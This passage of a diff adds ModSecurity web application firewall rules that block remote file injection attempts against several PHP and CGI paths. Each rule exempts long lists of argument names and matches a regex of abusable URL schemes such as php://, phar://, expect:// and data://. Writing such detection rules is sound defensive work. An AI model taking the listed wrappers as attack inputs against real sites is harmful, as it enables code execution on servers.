"phase:2,chain,t:none,t:lowercase,t:replaceNulls,t:compressWhitespace,t:urlDecodeUni,t:lowercase,t:htmlEntityDecode,multimatch,id:340463,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/target/|!ARGS:/redirect/|!ARGS:cforms_action_page|!ARGS:storyext|!ARGS:/^config/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:message|!ARGS:/^config/|!ARGS:SitePath|!ARGS:PreviewImage|!ARGS:Exlink|!ARGS:story|!ARGS:/page/|!ARGS:user_website|!ARGS:configuration[MODULE_PAYMENT_GOOGLECHECKOUT_MODE]|!ARGS:configParams[api][configParamValue]|!ARGS:q|!ARGS:stories_topics|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:lowercase,t:replaceNulls,t:compressWhitespace,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340462,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91045
+
+SecRule REQUEST_FILENAME "/installatron/index\.cgi" "phase:2,id:91046,t:none,t:lowercase,pass,nolog,noauditlog"
+
+
+SecRule REQUEST_FILENAME "/admin\.php" "phase:2,id:91047,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91048,t:none,pass,nolog,skipAfter:END_RULES_91048"
+
+
+#Skips
+#/wp-admin/admin.php?page=w3tc_cdn
+SecRule REQUEST_URI "(?:/wp-admin/admin\.php\?(?:page=(?:w3tc_cdn|ngg_other_options|wplinkdir_editlinks_page|settings|theme-options|gf_edit_forms|theme(?:-panel|_general)|wpi_page_manage_invoice|incipiens_options|layerslider|ch_header|(?:functions|under-construction)\.php|cmp-settings\.php)|frm_action=|cf/cf\.php)|^/admin\.php\?action=streambox)" "phase:2,id:'336793',rev:8,t:none,pass,nolog,noauditlog,skipAfter:END_RFI"
+
+SecRule ARGS|!ARGS:/dt_Header/|!ARGS:/fancybox/|!ARGS:/mp3/|!ARGS:subject|!ARGS:/theme/|!ARGS:/wpcf/|!ARGS:scope|!ARGS:slide[thumbnail]|!ARGS:cancel|!ARGS:search|!ARGS:/woocommerce/|!ARGS:/calendar/|!ARGS:/image/|!ARGS:/email/|!ARGS:/fb/|!ARGS:/cmodsar_custom/|!ARGS:/^woo/|!ARGS:/^gf_/|!ARGS:/^acf/|!ARGS:u_2|!ARGS:file_remote/|!ARGS:/skype/|!ARGS:/_uri/|!ARGS:/theone/|!ARGS:/^custom/|!ARGS:/thumbnail_adr/|!ARGS:default_value|!ARGS:value|!ARGS:/lightbox/|!ARGS:/zone/|!ARGS:/cloudflare/|!ARGS:/sidebar/|!ARGS:/html/|!ARGS:/flickr/|!ARGS:/^wpcrown_/|!ARGS:/vimeo/|!ARGS:postbody|!ARGS:podcast|!ARGS:/^exposed/|!ARGS:/^ke_/|!ARGS:flickr|!ARGS:msg|!ARGS:/link/|!ARGS:/skipjs/|!ARGS:/source/|!ARGS:wordpressbling_mail|!ARGS:/^hotec/|!ARGS:pp_set_bg|!ARGS:/^item_meta/|!ARGS:solution|!ARGS:/^sapWP/|!ARGS:/^cp_/|!ARGS:dribbble|!ARGS:sugarroot|!ARGS:minify.cache.files|!ARGS:name|!ARGS:/banner/|!ARGS:/form_action/|!ARGS:/option/|!ARGS:/stream/|!ARGS:/analytics_code/|!ARGS:/endpoint/|!ARGS:_local|!ARGS:lookup|!ARGS:/hostname/|!ARGS:/cdn/|!ARGS:/^ad/|!ARGS:/image/|!ARGS:/target/|!ARGS:shrbase|!ARGS:facebook|!ARGS:/twitter/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:youtube|!ARGS:myspace|!ARGS:form|!ARGS:/_fav/|!ARGS:_gen_gmap|!ARGS:/logo/|!ARGS:/img/|!ARGS:unsubscribe|!ARGS:/^dest_to/|!ARGS:/rss/|!ARGS:/lm_slide/|!ARGS:/feed/|!ARGS:/footer/|!ARGS:/^jsfiles/|!ARGS:/include/|!ARGS:/pagination/|!ARGS:/link/|!ARGS:/image/|!ARGS:/path/|!ARGS:/page/|!ARGS:field_b|!ARGS:/refer/|!ARGS:/^gbu0_/|!ARGS:/site/|!ARGS:/button/|!ARGS:guestbookLink|!ARGS:xmlpath|!ARGS:/^update/|!ARGS:/^woo_ad/|!ARGS:act_filepath|!ARGS:/domain/|!ARGS:opphomepage|!ARGS:echi_google_analytics|!ARGS:/^echi_block_/|!ARGS:/^echi_ad/|!ARGS:/icon/|!ARGS:descripcion|!ARGS:xcont_priv|!ARGS:/comments/|!ARGS:email|!ARGS:/video/|!ARGS:hometext|!ARGS:/text/|!ARGS:web|!ARGS:/^config/|!ARGS:/^g2_manualpath/|!ARGS:/^sDescription/|!ARGS:hidepost_content_text|!ARGS:sText|!ARGS:sfhome|!ARGS:homepage|!ARGS:field_3_name|!ARGS:cforms_cmsg|!ARGS:bcontent|!ARGS:form_location|!ARGS:footer|!ARGS:field_4_name|!ARGS:cforms_redirect_page|!ARGS:cforms_action_page|!ARGS:ecards_more_pic_target|!ARGS:message|!ARGS:/^xfoot/|!ARGS:/^FCKeditor/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/redirect/|!ARGS:content|!ARGS:/linkedin/|!ARGS:outbound|!ARGS:out|!ARGS:/twitter/|!ARGS:/^field/|!ARGS:/button/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/youtube/|!ARGS:/affredir/|!ARGS:helpbox|!ARGS:return|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:thelink|!ARGS:params[altTag]|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:config[latestNewsRRS]|!ARGS:sponsor|!ARGS:config[ftp_server]|!ARGS:listViewerCode|!ARGS:/element/|!ARGS:/google/|!ARGS:courier_tracking|!ARGS:/field_id/|!ARGS:/social_profile/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340464,rev:58,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (admin.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/dt_Header/|!ARGS:/fancybox/|!ARGS:/mp3/|!ARGS:/email/|!ARGS:subject|!ARGS:/wpcf/|!ARGS:scope|!ARGS:cancel|!ARGS:slide[thumbnail]|!ARGS:/^hotec/|!ARGS:search|!ARGS:/^woo/|!ARGS:/calendar/|!ARGS:/theme/|!ARGS:/fb/|!ARGS:/^gf_/|!ARGS:/cmodsar_custom/|!ARGS:/^acf/|!ARGS:u_2|!ARGS:/woocommerce/|!ARGS:file_remote/|!ARGS:/skype/|!ARGS:/^custom/|!ARGS:/theone/|!ARGS:/_uri/|!ARGS:/thumbnail_adr/|!ARGS:default_value|!ARGS:value|!ARGS:/lightbox/|!ARGS:/zone/|!ARGS:/cloudflare/|!ARGS:/sidebar/|!ARGS:/html/|!ARGS:/^wpcrown_/|!ARGS:object\[submit_background\]|!ARGS:postbody|!ARGS:podcast|!ARGS:/flickr/|!ARGS:/image/|!ARGS:/vimeo/|!ARGS:page|!ARGS:msg|!ARGS:/link/|!ARGS:/skipjs/|!ARGS:/source/|!ARGS:/^ke_/|!ARGS:flickr|!ARGS:wordpressbling_mail|!ARGS:pp_set_bg|!ARGS:/^item_meta/|!ARGS:solution|!ARGS:/^sapWP/|!ARGS:/^cp_/|!ARGS:dribbble|!ARGS:sugarroot|!ARGS:minify.cache.files|!ARGS:name|!ARGS:/banner/|!ARGS:/form_action/|!ARGS:/option/|!ARGS:/button/|!ARGS:/stream/|!ARGS:/analytics_code/|!ARGS:/endpoint/|!ARGS:_local|!ARGS:lookup|!ARGS:/hostname/|!ARGS:/cdn/|!ARGS:/^ad/|!ARGS:/image/|!ARGS:/target/|!ARGS:shrbase|!ARGS:/twitter/|!ARGS:/domain/|!ARGS:linkedin|!ARGS:myspace|!ARGS:form|!ARGS:/logo/|!ARGS:/img/|!ARGS:unsubscribe|!ARGS:/^dest_to/|!ARGS:/_fav/|!ARGS:_gen_gmap|!ARGS:/rss/|!ARGS:/lm_slide/|!ARGS:/feed/|!ARGS:/footer/|!ARGS:/^jsfiles/|!ARGS:/pagination/|!ARGS:/include/|!ARGS:/link/|!ARGS:/image/|!ARGS:/logo/|!ARGS:/path/|!ARGS:/page/|!ARGS:field_b|!ARGS:/refer/|!ARGS:/^gbu0_/|!ARGS:/site/|!ARGS:guestbookLink|!ARGS:xmlpath|!ARGS:/^update/|!ARGS:/^woo_ad/|!ARGS:act_filepath|!ARGS:act_link|!ARGS:opphomepage|!ARGS:event_link|!ARGS:echi_google_analytics|!ARGS:/^echi_block_/|!ARGS:/^echi_ad/|!ARGS:/^permalink/|!ARGS:/icon/|!ARGS:descripcion|!ARGS:xcont_priv|!ARGS:email|!ARGS:/video/|!ARGS:hometext|!ARGS:/text/|!ARGS:web|!ARGS:/^config/|!ARGS:/^g2_manualpath/|!ARGS:/^sDescription/|!ARGS:hidepost_content_text|!ARGS:sText|!ARGS:homepage|!ARGS:field_3_name|!ARGS:cforms_cmsg|!ARGS:bcontent|!ARGS:form_location|!ARGS:sslloginlink|!ARGS:footer|!ARGS:field_4_name|!ARGS:cforms_redirect_page|!ARGS:ecards_more_pic_target|!ARGS:cforms_action_page|!ARGS:message/|!ARGS:/^xfoot/|!ARGS:/^FCKeditor/|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/redirect/|!ARGS:content|!ARGS:q|!ARGS:/linkedin/|!ARGS:outbound|!ARGS:out|!ARGS:/twitter/|!ARGS:/^field/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/youtube/|!ARGS:helpurl|!ARGS:helpbox|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:ajaxurl|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:install_url|!ARGS:/comments/|!ARGS:resource|!ARGS:thelink|!ARGS:/affredir/|!ARGS:params[altTag]|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:config[latestNewsRRS]|!ARGS:sfhome|!ARGS:sponsor|!ARGS:config[ftp_server]|!ARGS:/element/|!ARGS:/google/|!ARGS:listViewerCode|!ARGS:/field_id/|!ARGS:/social_profile/|!ARGS:courier_tracking "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340465,rev:58,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (admin.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecMarker END_RFI
+
+
+
+SecMarker END_RULES_91048
+
+SecRule REQUEST_FILENAME "/cpinquiry\.php" "phase:2,id:91049,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91050,t:none,pass,nolog,skipAfter:END_RULES_91050"
+
+SecRule ARGS|!ARGS:comments|!ARGS:content|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340466,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (cpinquiry.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:comments|!ARGS:content|!ARGS:q|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340467,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (cpinquiry.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91050
+
+SecRule REQUEST_FILENAME "/admin/area/save-page\.php" "phase:2,id:91051,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91052,t:none,pass,nolog,skipAfter:END_RULES_91052"
+
+SecRule ARGS|!ARGS:signature|!ARGS:website|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:page-content|!ARGS:comments|!ARGS:content|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340468,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (save-page.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:signature|!ARGS:website|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:page-content|!ARGS:comments|!ARGS:content|!ARGS:q|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340469,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (save-page.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91052
+
+SecRule REQUEST_FILENAME "/cgi-bin/guestbook\.pl" "phase:2,id:91053,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91054,t:none,pass,nolog,skipAfter:END_RULES_91054"
+
+SecRule ARGS|!ARGS:FOOTER|!ARGS:MESSAGE|!ARGS:header|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340470,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (guestbook.pl)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:FOOTER|!ARGS:MESSAGE|!ARGS:header|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340471,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (guestbook.pl)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91054
+
